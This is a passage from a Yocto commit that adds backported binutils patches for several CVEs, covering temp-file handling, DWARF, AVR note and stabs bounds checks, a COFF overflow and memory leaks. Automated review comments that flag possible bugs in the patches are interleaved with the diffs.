+-char *make_tempname (const char *);
++char *make_tempname (const char *, int *);
+ char *make_tempdir (const char *);
+
+ bfd_vma parse_vma (const char *, const char *);
+@@ -71,7 +71,8 @@ extern void print_version (const char *);
+ /* In rename.c. */
+ extern void set_times (const char *, const struct stat *);
+
+-extern int smart_rename (const char *, const char *, int);
++extern int smart_rename (const char *, const char *, struct stat *);
++
+
+ /* In libiberty. */
+ void *xmalloc (size_t);
+diff --git a/binutils/objcopy.c b/binutils/objcopy.c
+index 212e25144e6..5ccbd926610 100644
+--- a/binutils/objcopy.c
++++ b/binutils/objcopy.c
+@@ -3682,7 +3682,7 @@ set_long_section_mode (bfd *output_bfd, bfd *input_bfd, enum long_section_name_h
+ /* The top-level control. */
+
+ static void
+-copy_file (const char *input_filename, const char *output_filename,
++copy_file (const char *input_filename, const char *output_filename, int ofd,
+ const char *input_target, const char *output_target,
+ const bfd_arch_info_type *input_arch)
+ {
+@@ -3757,9 +3757,14 @@ copy_file (const char *input_filename, const char *output_filename,
+ else
+ force_output_target = TRUE;
+
+- obfd = bfd_openw (output_filename, output_target);
++ if (ofd >= 0)
++ obfd = bfd_fdopenw (output_filename, output_target, ofd);
++ else
++ obfd = bfd_openw (output_filename, output_target);
++
+ if (obfd == NULL)
+ {
++ close (ofd);
+ bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
+ status = 1;
+ return;
+@@ -3787,13 +3792,19 @@ copy_file (const char *input_filename, const char *output_filename,
+ if (output_target == NULL)
+ output_target = bfd_get_target (ibfd);
+
+- obfd = bfd_openw (output_filename, output_target);
++ if (ofd >= 0)
++ obfd = bfd_fdopenw (output_filename, output_target, ofd);
++ else
++ obfd = bfd_openw (output_filename, output_target);
++
+ if (obfd == NULL)
+ {
++ close (ofd);
+ bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
+ status = 1;
+ return;
+ }
++
+ /* This is a no-op on non-Coff targets. */
+ set_long_section_mode (obfd, ibfd, long_section_names);
+
+@@ -4746,6 +4757,7 @@ strip_main (int argc, char *argv[])
+ int hold_status = status;
+ struct stat statbuf;
+ char *tmpname;
++ int tmpfd = -1;
+
+ if (get_file_size (argv[i]) < 1)
+ {
+@@ -4760,7 +4772,7 @@ strip_main (int argc, char *argv[])
+
+ if (output_file == NULL
+ || filename_cmp (argv[i], output_file) == 0)
+- tmpname = make_tempname (argv[i]);
++ tmpname = make_tempname (argv[i], &tmpfd);
+ else
+ tmpname = output_file;
+
+@@ -4773,15 +4785,13 @@ strip_main (int argc, char *argv[])
+ }
+
+ status = 0;
+- copy_file (argv[i], tmpname, input_target, output_target, NULL);
++ copy_file (argv[i], tmpname, tmpfd, input_target, output_target, NULL);
+ if (status == 0)
+ {
+- if (preserve_dates)
+- set_times (tmpname, &statbuf);
+ if (output_file != tmpname)
+ status = (smart_rename (tmpname,
+ output_file ? output_file : argv[i],
+- preserve_dates) != 0);
++ preserve_dates ? &statbuf : NULL) != 0);
+ if (status == 0)
+ status = hold_status;
+ }
+@@ -4993,7 +5003,7 @@ copy_main (int argc, char *argv[])
+ bfd_boolean formats_info = FALSE;
+ bfd_boolean use_globalize = FALSE;
+ bfd_boolean use_keep_global = FALSE;
+- int c;
++ int c, tmpfd = -1;
+ struct stat statbuf;
+ const bfd_arch_info_type *input_arch = NULL;
+
+@@ -5839,7 +5849,7 @@ copy_main (int argc, char *argv[])
+ are the same, then create a temp and rename the result into the input. */
+ if (output_filename == NULL
+ || filename_cmp (input_filename, output_filename) == 0)
+- tmpname = make_tempname (input_filename);
++ tmpname = make_tempname (input_filename, &tmpfd);
+ else
+ tmpname = output_filename;
+
+@@ -5847,14 +5857,13 @@ copy_main (int argc, char *argv[])
+ fatal (_("warning: could not create temporary file whilst copying '%s', (error: %s)"),
+ input_filename, strerror (errno));
+
+- copy_file (input_filename, tmpname, input_target, output_target, input_arch);
++ copy_file (input_filename, tmpname, tmpfd, input_target, output_target,
++ input_arch);
+ if (status == 0)
+ {
+- if (preserve_dates)
+- set_times (tmpname, &statbuf);
+ if (tmpname != output_filename)
+ status = (smart_rename (tmpname, input_filename,
+- preserve_dates) != 0);
++ preserve_dates ? &statbuf : NULL) != 0);
+ }
+ else
+ unlink_if_ordinary (tmpname);
+diff --git a/binutils/rename.c b/binutils/rename.c
+index bf3b68d0462..07d44d0f314 100644
+--- a/binutils/rename.c
++++ b/binutils/rename.c
+@@ -24,14 +24,9 @@
+
+ #ifdef HAVE_GOOD_UTIME_H
+ #include <utime.h>
+-#else /* ! HAVE_GOOD_UTIME_H */
+-#ifdef HAVE_UTIMES
++#elif defined HAVE_UTIMES
+ #include <sys/time.h>
+-#endif /* HAVE_UTIMES */
+-#endif /* ! HAVE_GOOD_UTIME_H */
+-
+-#if ! defined (_WIN32) || defined (__CYGWIN32__)
+-static int simple_copy (const char *, const char *);
++#endif
+
+ /* The number of bytes to copy at once. */
+ #define COPY_BUF 8192
+@@ -82,7 +77,6 @@ simple_copy (const char *from, const char *to)
+ }
+ return 0;
+ }
+-#endif /* __CYGWIN32__ or not _WIN32 */
+
+ /* Set the times of the file DESTINATION to be the same as those in
+ STATBUF. */
+@@ -91,122 +85,52 @@ void
+ set_times (const char *destination, const struct stat *statbuf)
+ {
+ int result;
+-
+- {
+ #ifdef HAVE_GOOD_UTIME_H
+- struct utimbuf tb;
+-
+- tb.actime = statbuf->st_atime;
+- tb.modtime = statbuf->st_mtime;
+- result = utime (destination, &tb);
+-#else /* ! HAVE_GOOD_UTIME_H */
+-#ifndef HAVE_UTIMES
+- long tb[2];
+-
+- tb[0] = statbuf->st_atime;
+- tb[1] = statbuf->st_mtime;
+- result = utime (destination, tb);
+-#else /* HAVE_UTIMES */
+- struct timeval tv[2];
+-
+- tv[0].tv_sec = statbuf->st_atime;
+- tv[0].tv_usec = 0;
+- tv[1].tv_sec = statbuf->st_mtime;
+- tv[1].tv_usec = 0;
+- result = utimes (destination, tv);
+-#endif /* HAVE_UTIMES */
+-#endif /* ! HAVE_GOOD_UTIME_H */
+- }
++ struct utimbuf tb;
++
++ tb.actime = statbuf->st_atime;
++ tb.modtime = statbuf->st_mtime;
++ result = utime (destination, &tb);
++#elif defined HAVE_UTIMES
++ struct timeval tv[2];
++
++ tv[0].tv_sec = statbuf->st_atime;
++ tv[0].tv_usec = 0;
++ tv[1].tv_sec = statbuf->st_mtime;
++ tv[1].tv_usec = 0;
++ result = utimes (destination, tv);
++#else
++ long tb[2];
++
++ tb[0] = statbuf->st_atime;
++ tb[1] = statbuf->st_mtime;
++ result = utime (destination, tb);
++#endif
+
+ if (result != 0)
+ non_fatal (_("%s: cannot set time: %s"), destination, strerror (errno));
+ }
+
+-#ifndef S_ISLNK
+-#ifdef S_IFLNK
+-#define S_ISLNK(m) (((m) & S_IFMT) == S_IFLNK)
+-#else
+-#define S_ISLNK(m) 0
+-#define lstat stat
+-#endif
+-#endif
+-
+-/* Rename FROM to TO, copying if TO is a link.
+- Return 0 if ok, -1 if error. */
++/* Copy FROM to TO. TARGET_STAT has the file status that, if non-NULL,
++ is used to fix up timestamps. Return 0 if ok, -1 if error.
++ At one time this function renamed files, but file permissions are
++ tricky to update given the number of different schemes used by
++ various systems. So now we just copy. */
+
+ int
+-smart_rename (const char *from, const char *to, int preserve_dates ATTRIBUTE_UNUSED)
++smart_rename (const char *from, const char *to,
++ struct stat *target_stat)
+ {
+- bfd_boolean exists;
+- struct stat s;
+- int ret = 0;
+-
+- exists = lstat (to, &s) == 0;
+-
+-#if defined (_WIN32) && !defined (__CYGWIN32__)
+- /* Win32, unlike unix, will not erase `to' in `rename(from, to)' but
+- fail instead. Also, chown is not present. */
++ int ret;
+
+- if (exists)
+- remove (to);
+-
+- ret = rename (from, to);
++ ret = simple_copy (from, to);
+ if (ret != 0)
+- {
+- /* We have to clean up here. */
+- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
+- unlink (from);
+- }
+-#else
+- /* Use rename only if TO is not a symbolic link and has
+- only one hard link, and we have permission to write to it. */
+- if (! exists
+- || (!S_ISLNK (s.st_mode)
+- && S_ISREG (s.st_mode)
+- && (s.st_mode & S_IWUSR)
+- && s.st_nlink == 1)
+- )
+- {
+- ret = rename (from, to);
+- if (ret == 0)
+- {
+- if (exists)
+- {
+- /* Try to preserve the permission bits and ownership of
+- TO. First get the mode right except for the setuid
+- bit. Then change the ownership. Then fix the setuid
+- bit. We do the chmod before the chown because if the
+- chown succeeds, and we are a normal user, we won't be
+- able to do the chmod afterward. We don't bother to
+- fix the setuid bit first because that might introduce
+- a fleeting security problem, and because the chown
+- will clear the setuid bit anyhow. We only fix the
+- setuid bit if the chown succeeds, because we don't
+- want to introduce an unexpected setuid file owned by
+- the user running objcopy. */
+- chmod (to, s.st_mode & 0777);
+- if (chown (to, s.st_uid, s.st_gid) >= 0)
+- chmod (to, s.st_mode & 07777);
+- }
+- }
+- else
+- {
+- /* We have to clean up here. */
+- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
+- unlink (from);
+- }
+- }
+- else
+- {
+- ret = simple_copy (from, to);
+- if (ret != 0)
+- non_fatal (_("unable to copy file '%s'; reason: %s"), to, strerror (errno));
++ non_fatal (_("unable to copy file '%s'; reason: %s"),
++ to, strerror (errno));
+
+- if (preserve_dates)
+- set_times (to, &s);
+- unlink (from);
+- }
+-#endif /* _WIN32 && !__CYGWIN32__ */
++ if (target_stat != NULL)
++ set_times (to, target_stat);
++ unlink (from);
+
+ return ret;
+ }
+--
+2.17.1
+
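Review bot: The descriptor handed out by `make_tempname` can be closed twice on the failure path. In the opncls.c hunk `bfd_fdopenw` itself calls `close (fd)` before returning NULL when the BFD is not writable, yet the `obfd == NULL` branches added to `write_archive` (ar.c) and to both call sites in `copy_file` (objcopy.c) call `close (ofd)` again, and in `copy_file` that also runs with `ofd == -1` after the `bfd_openw` branch. A repeated close can hit a descriptor number that has been reused in the meantime, so one side should own the close, for example by dropping the caller-side `close (ofd);` lines. Separately, the rewritten `smart_rename` still runs `set_times (to, target_stat)` and `unlink (from)` when `simple_copy` has failed, which removes the only complete copy of the output; guarding both with `if (ret == 0)` would keep it. `simple_copy` and `bfd_fdopenr` are defined outside this patch, so whether they also close the descriptor or follow a symlink at `to` cannot be confirmed from here.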
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
new file mode 100644
index 0000000000..1502d03f43
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
@@ -0,0 +1,83 @@
+From 647cebce12a6b0a26960220caff96ff38978cf24 Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Thu, 26 Nov 2020 17:08:33 +0000
+Subject: [PATCH] Prevent a memory allocation failure when parsing corrupt
+ DWARF debug sections.
+
+ PR 26946
+ * dwarf2.c (read_section): Check for debug sections with excessive
+ sizes.
+
+
+Upstream-Status: Backport [
+https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=647cebce12a6b0a26960220caff96ff38978cf24
+]
+CVE: CVE-2021-3487
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ bfd/dwarf2.c | 25 +++++++++++++++++++------
+ 1 files changed, 25 insertions(+), 6 deletions(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index 977bf43a6a1..8bbfc81d3e7 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -531,22 +531,24 @@ read_section (bfd * abfd,
+ bfd_byte ** section_buffer,
+ bfd_size_type * section_size)
+ {
+- asection *msec;
+ const char *section_name = sec->uncompressed_name;
+ bfd_byte *contents = *section_buffer;
+- bfd_size_type amt;
+
+ /* The section may have already been read. */
+ if (contents == NULL)
+ {
++ bfd_size_type amt;
++ asection *msec;
++ ufile_ptr filesize;
++
+ msec = bfd_get_section_by_name (abfd, section_name);
+- if (! msec)
++ if (msec == NULL)
+ {
+ section_name = sec->compressed_name;
+ if (section_name != NULL)
+ msec = bfd_get_section_by_name (abfd, section_name);
+ }
+- if (! msec)
++ if (msec == NULL)
+ {
+ _bfd_error_handler (_("DWARF error: can't find %s section."),
+ sec->uncompressed_name);
+@@ -554,12 +556,23 @@ read_section (bfd * abfd,
+ return FALSE;
+ }
+
+- *section_size = msec->rawsize ? msec->rawsize : msec->size;
++ amt = bfd_get_section_limit_octets (abfd, msec);
++ filesize = bfd_get_file_size (abfd);
++ if (amt >= filesize)
++ {
++ /* PR 26946 */
++ _bfd_error_handler (_("DWARF error: section %s is larger than its filesize! (0x%lx vs 0x%lx)"),
++ section_name, (long) amt, (long) filesize);
++ bfd_set_error (bfd_error_bad_value);
++ return FALSE;
++ }
++ *section_size = amt;
+ /* Paranoia - alloc one extra so that we can make sure a string
+ section is NUL terminated. */
+- amt = *section_size + 1;
++ amt += 1;
+ if (amt == 0)
+ {
++ /* Paranoia - this should never happen. */
+ bfd_set_error (bfd_error_no_memory);
+ return FALSE;
+ }
+--
+2.27.0
+
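Review bot: The new guard `if (amt >= filesize)` in `read_section` would reject every debug section whenever `bfd_get_file_size` cannot determine a size, assuming it reports that case as 0 (its definition is outside this patch). If so, the test should read `if (filesize != 0 && amt >= filesize)`. It is also worth confirming what `bfd_get_section_limit_octets` returns for compressed debug sections, since a decompressed size can legitimately exceed the file size and would then be reported as corrupt. The error message casts both values to `long` for `%lx`, which truncates where `long` is 32 bits and does not match the unsigned conversion; `(unsigned long)` is the minimum fix.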
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
new file mode 100644
index 0000000000..5f56dd7696
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
@@ -0,0 +1,183 @@
+From 1cfcf3004e1830f8fe9112cfcd15285508d2c2b7 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 11 Feb 2021 16:56:42 +1030
+Subject: [PATCH] PR27290, PR27293, PR27295, various avr objdump fixes
+
+Adds missing sanity checks for avr device info note, to avoid
+potential buffer overflows. Uses bfd_malloc_and_get_section for
+sanity checking section size.
+
+ PR 27290
+ PR 27293
+ PR 27295
+ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
+ Use bfd_malloc_and_get_section.
+ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
+ check namesz. Return NULL if descsz is too small. Ensure
+ string table is terminated.
+ (elf32_avr_get_device_info): Formatting. Add note_size param.
+ Sanity check note.
+ (elf32_avr_dump_mem_usage): Adjust to suit.
+
+Upstream-Status: Backport
+CVE: CVE-2021-3549
+Signed-of-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index 1e9a96c9bb6..02e5019204e 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,17 @@
++2021-02-11 Alan Modra <amodra@gmail.com>
++
++ PR 27290
++ PR 27293
++ PR 27295
++ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
++ Use bfd_malloc_and_get_section.
++ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
++ check namesz. Return NULL if descsz is too small. Ensure
++ string table is terminated.
++ (elf32_avr_get_device_info): Formatting. Add note_size param.
++ Sanity check note.
++ (elf32_avr_dump_mem_usage): Adjust to suit.
++
+ 2020-03-25 H.J. Lu <hongjiu.lu@intel.com>
+
+ * ar.c (main): Update bfd_plugin_set_program_name call.
+diff --git a/binutils/od-elf32_avr.c b/binutils/od-elf32_avr.c
+index 5ec99957fe9..1d32bce918e 100644
+--- a/binutils/od-elf32_avr.c
++++ b/binutils/od-elf32_avr.c
+@@ -77,23 +77,29 @@ elf32_avr_filter (bfd *abfd)
+ return bfd_get_flavour (abfd) == bfd_target_elf_flavour;
+ }
+
+-static char*
++static char *
+ elf32_avr_get_note_section_contents (bfd *abfd, bfd_size_type *size)
+ {
+ asection *section;
++ bfd_byte *contents;
+
+- if ((section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo")) == NULL)
++ section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo");
++ if (section == NULL)
+ return NULL;
+
+- *size = bfd_section_size (section);
+- char *contents = (char *) xmalloc (*size);
+- bfd_get_section_contents (abfd, section, contents, 0, *size);
++ if (!bfd_malloc_and_get_section (abfd, section, &contents))
++ {
++ free (contents);
++ contents = NULL;
++ }
+
+- return contents;
++ *size = bfd_section_size (section);
++ return (char *) contents;
+ }
+
+-static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+- bfd_size_type size)
++static char *
++elf32_avr_get_note_desc (bfd *abfd, char *contents, bfd_size_type size,
++ bfd_size_type *descsz)
+ {
+ Elf_External_Note *xnp = (Elf_External_Note *) contents;
+ Elf_Internal_Note in;
+@@ -107,42 +113,54 @@ static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+ if (in.namesz > contents - in.namedata + size)
+ return NULL;
+
++ if (in.namesz != 4 || strcmp (in.namedata, "AVR") != 0)
++ return NULL;
++
+ in.descsz = bfd_get_32 (abfd, xnp->descsz);
+ in.descdata = in.namedata + align_power (in.namesz, 2);
+- if (in.descsz != 0
+- && (in.descdata >= contents + size
+- || in.descsz > contents - in.descdata + size))
++ if (in.descsz < 6 * sizeof (uint32_t)
++ || in.descdata >= contents + size
++ || in.descsz > contents - in.descdata + size)
+ return NULL;
+
+- if (strcmp (in.namedata, "AVR") != 0)
+- return NULL;
++ /* If the note has a string table, ensure it is 0 terminated. */
++ if (in.descsz > 8 * sizeof (uint32_t))
++ in.descdata[in.descsz - 1] = 0;
+
++ *descsz = in.descsz;
+ return in.descdata;
+ }
+
+ static void
+ elf32_avr_get_device_info (bfd *abfd, char *description,
+- deviceinfo *device)
++ bfd_size_type desc_size, deviceinfo *device)
+ {
+ if (description == NULL)
+ return;
+
+ const bfd_size_type memory_sizes = 6;
+
+- memcpy (device, description, memory_sizes * sizeof(uint32_t));
+- device->name = NULL;
++ memcpy (device, description, memory_sizes * sizeof (uint32_t));
++ desc_size -= memory_sizes * sizeof (uint32_t);
++ if (desc_size < 8)
++ return;
+
+- uint32_t *stroffset_table = ((uint32_t *) description) + memory_sizes;
++ uint32_t *stroffset_table = (uint32_t *) description + memory_sizes;
+ bfd_size_type stroffset_table_size = bfd_get_32 (abfd, stroffset_table);
+- char *str_table = ((char *) stroffset_table) + stroffset_table_size;
+
+ /* If the only content is the size itself, there's nothing in the table */
+- if (stroffset_table_size == 4)
++ if (stroffset_table_size < 8)
+ return;
++ if (desc_size <= stroffset_table_size)
++ return;
++ desc_size -= stroffset_table_size;
+
+ /* First entry is the device name index. */
+ uint32_t device_name_index = bfd_get_32 (abfd, stroffset_table + 1);
++ if (device_name_index >= desc_size)
++ return;
+
++ char *str_table = (char *) stroffset_table + stroffset_table_size;
+ device->name = str_table + device_name_index;
+ }
+
+@@ -183,7 +201,7 @@ static void
+ elf32_avr_dump_mem_usage (bfd *abfd)
+ {
+ char *description = NULL;
+- bfd_size_type note_section_size = 0;
++ bfd_size_type sec_size, desc_size;
+
+ deviceinfo device = { 0, 0, 0, 0, 0, 0, NULL };
+ device.name = "Unknown";
+@@ -192,13 +210,13 @@ elf32_avr_dump_mem_usage (bfd *abfd)
+ bfd_size_type text_usage = 0;
+ bfd_size_type eeprom_usage = 0;
+
+- char *contents = elf32_avr_get_note_section_contents (abfd,
+- &note_section_size);
++ char *contents = elf32_avr_get_note_section_contents (abfd, &sec_size);
+
+ if (contents != NULL)
+ {
+- description = elf32_avr_get_note_desc (abfd, contents, note_section_size);
+- elf32_avr_get_device_info (abfd, description, &device);
++ description = elf32_avr_get_note_desc (abfd, contents, sec_size,
++ &desc_size);
++ elf32_avr_get_device_info (abfd, description, desc_size, &device);
+ }
+
+ elf32_avr_get_memory_usage (abfd, &text_usage, &data_usage,
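Review bot: In `elf32_avr_dump_mem_usage`, `desc_size` is declared without an initializer and is written by `elf32_avr_get_note_desc` only on its success path (`*descsz = in.descsz;`), so when that function returns NULL an indeterminate value is passed to `elf32_avr_get_device_info`. The callee returns early on `description == NULL`, so nothing reads the value today, but the safety rests on that ordering; `bfd_size_type sec_size = 0, desc_size = 0;` removes the dependency. The same initializer covers `*size`, which `elf32_avr_get_note_section_contents` leaves unset when the section is missing. The new bounds checks use bare multiples of `sizeof (uint32_t)` (6 and 8) and a literal 8, so a short comment naming the note layout they assume would make them easier to audit.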
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
new file mode 100644
index 0000000000..2addf5139e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
@@ -0,0 +1,35 @@
+From 46322722ad40ac1a75672ae0f62f4969195f1368 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 20 Jan 2022 13:58:38 +1030
+Subject: [PATCH] PR28753, buffer overflow in read_section_stabs_debugging_info
+
+ PR 28753
+ * rddbg.c (read_section_stabs_debugging_info): Don't read past
+ end of section when concatentating stab strings.
+
+CVE: CVE-2021-46174
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=cad4d6b91e97]
+
+(cherry picked from commit 085b299b71721e15f5c5c5344dc3e4e4536dadba)
+(cherry picked from commit cad4d6b91e97b6962807d33c04ed7e7797788438)
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+---
+ binutils/rddbg.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/binutils/rddbg.c b/binutils/rddbg.c
+index 72e934055b5..5e76d94a3c4 100644
+--- a/binutils/rddbg.c
++++ b/binutils/rddbg.c
+@@ -207,7 +207,7 @@ read_section_stabs_debugging_info (bfd *abfd, asymbol **syms, long symcount,
+ an attempt to read the byte before 'strings' would occur. */
+ while ((len = strlen (s)) > 0
+ && s[len - 1] == '\\'
+- && stab + 12 < stabs + stabsize)
++ && stab + 16 <= stabs + stabsize)
+ {
+ char *p;
+
+--
+2.23.1
+
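Review bot: The corrected bound `stab + 16 <= stabs + stabsize` is evaluated by forming `stab + 16`, which can point more than one element past the end of the buffer when fewer than 16 bytes remain; comparing the remaining length avoids that, e.g. `&& stabs + stabsize - stab >= 16)`. The constant also needs a comment, because the loop body lies outside the hunk and the reader cannot see why 16 rather than 12 is required. Presumably the body advances by one 12-byte stab entry and then reads a 4-byte string index, so something like `/* Need the next 12-byte entry plus its 4-byte strx. */` once that is confirmed against the body.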
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
new file mode 100644
index 0000000000..102d65f8a6
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
@@ -0,0 +1,37 @@
+From ef186fe54aa6d281a3ff8a9528417e5cc614c797 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sat, 13 Aug 2022 15:32:47 +0930
+Subject: [PATCH] PR29482 - strip: heap-buffer-overflow
+
+ PR 29482
+ * coffcode.h (coff_set_section_contents): Sanity check _LIB.
+
+CVE: CVE-2022-38533
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=ef186fe54aa6d281a3ff8a9528417e5cc614c797]
+
+Signed-off-by: Florin Diaconescu <florin.diaconescu009@gmail.com>
+
+---
+ bfd/coffcode.h | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/bfd/coffcode.h b/bfd/coffcode.h
+index dec2e9c6370..75c18d88602 100644
+--- a/bfd/coffcode.h
++++ b/bfd/coffcode.h
+@@ -4170,10 +4170,13 @@ coff_set_section_contents (bfd * abfd,
+
+ rec = (bfd_byte *) location;
+ recend = rec + count;
+- while (rec < recend)
++ while (recend - rec >= 4)
+ {
++ size_t len = bfd_get_32 (abfd, rec);
++ if (len == 0 || len > (size_t) (recend - rec) / 4)
++ break;
++ rec += len * 4;
+ ++section->lma;
+- rec += bfd_get_32 (abfd, rec) * 4;
+ }
+
+ BFD_ASSERT (rec == recend);
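Review bot: A malformed `_LIB` record now leaves the loop through `break`, and the only report of it is the existing `BFD_ASSERT (rec == recend);` after the loop. An assertion is a weak channel for an input-validation failure: `section->lma` keeps the partial count and, as far as the hunk shows, `coff_set_section_contents` carries on with the write. Consider calling `bfd_set_error (bfd_error_bad_value)` and returning failure at the `break` instead; the function's return path is outside the hunk, so the exact return value has to be checked there. A one-line comment on `len > (size_t) (recend - rec) / 4` stating that `len` counts 4-byte words would also help the next reader.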
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
new file mode 100644
index 0000000000..ddb564bc8c
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
@@ -0,0 +1,32 @@
+From 0ebc886149c22aceaf8ed74267821a59ca9d03eb Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:00:41 +0930
+Subject: [PATCH] PR29254, memory leak in stab_demangle_v3_arg
+
+ PR 29254
+ * stabs.c (stab_demangle_v3_arg): Free dt on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0ebc886149c22aceaf8ed74267821a59ca9d03eb]
+CVE: CVE-2022-47007
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 2b5241637c1..796ff85b86a 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -5476,7 +5476,10 @@
+ dc->u.s_binary.right,
+ &varargs);
+ if (pargs == NULL)
+- return NULL;
++ {
++ free (dt);
++ return NULL;
++ }
+
+ return debug_make_function_type (dhandle, dt, pargs, varargs);
+ }
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
new file mode 100644
index 0000000000..9527390ccf
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
@@ -0,0 +1,64 @@
+From d6e1d48c83b165c129cb0aa78905f7ca80a1f682 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:13:38 +0930
+Subject: [PATCH] PR29255, memory leak in make_tempdir
+
+ PR 29255
+ * bucomm.c (make_tempdir, make_tempname): Free template on all
+ failure paths.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=d6e1d48c83b165c129cb0aa78905f7ca80a1f682]
+CVE: CVE-2022-47008
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/bucomm.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/binutils/bucomm.c b/binutils/bucomm.c
+index fdc2209df9c..4395cb9f7f5 100644
+--- a/binutils/bucomm.c
++++ b/binutils/bucomm.c
+@@ -542,8 +542,9 @@
+ #else
+ tmpname = mktemp (tmpname);
+ if (tmpname == NULL)
+- return NULL;
+- fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
++ fd = -1;
++ else
++ fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
+ #endif
+ if (fd == -1)
+ {
+@@ -561,22 +562,23 @@
+ make_tempdir (const char *filename)
+ {
+ char *tmpname = template_in_dir (filename);
++ char *ret;
+
+ #ifdef HAVE_MKDTEMP
+- return mkdtemp (tmpname);
++ ret = mkdtemp (tmpname);
+ #else
+- tmpname = mktemp (tmpname);
+- if (tmpname == NULL)
+- return NULL;
++ ret = mktemp (tmpname);
+ #if defined (_WIN32) && !defined (__CYGWIN32__)
+ if (mkdir (tmpname) != 0)
+- return NULL;
++ ret = NULL;
+ #else
+ if (mkdir (tmpname, 0700) != 0)
+- return NULL;
++ ret = NULL;
+ #endif
+- return tmpname;
+ #endif
++ if (ret == NULL)
++ free (tmpname);
++ return ret;
+ }
+
+ /* Parse a string into a VMA, with a fatal error if it can't be
+
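Review bot: In the first inner hunk (make_tempname, the `mktemp` branch) the template buffer is still lost when `mktemp` returns NULL, because `tmpname` has already been overwritten with that NULL before `fd = -1` sends control to the shared `if (fd == -1)` block. That block's body lies outside the hunk, so this assumes it frees `tmpname`; if it does, it frees NULL rather than the template. The make_tempdir hunk avoids the same problem by keeping the result in a separate `ret`, and make_tempname could do likewise: `char *ret = mktemp (tmpname);` followed by `fd = ret == NULL ? -1 : open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);`.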
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
new file mode 100644
index 0000000000..d831ed4756
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
@@ -0,0 +1,34 @@
+From 0d02e70b197c786f26175b9a73f94e01d14abdab Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:31 +0930
+Subject: [PATCH] PR29262, memory leak in pr_function_type
+
+ PR 29262
+ * prdbg.c (pr_function_type): Free "s" on failure path.
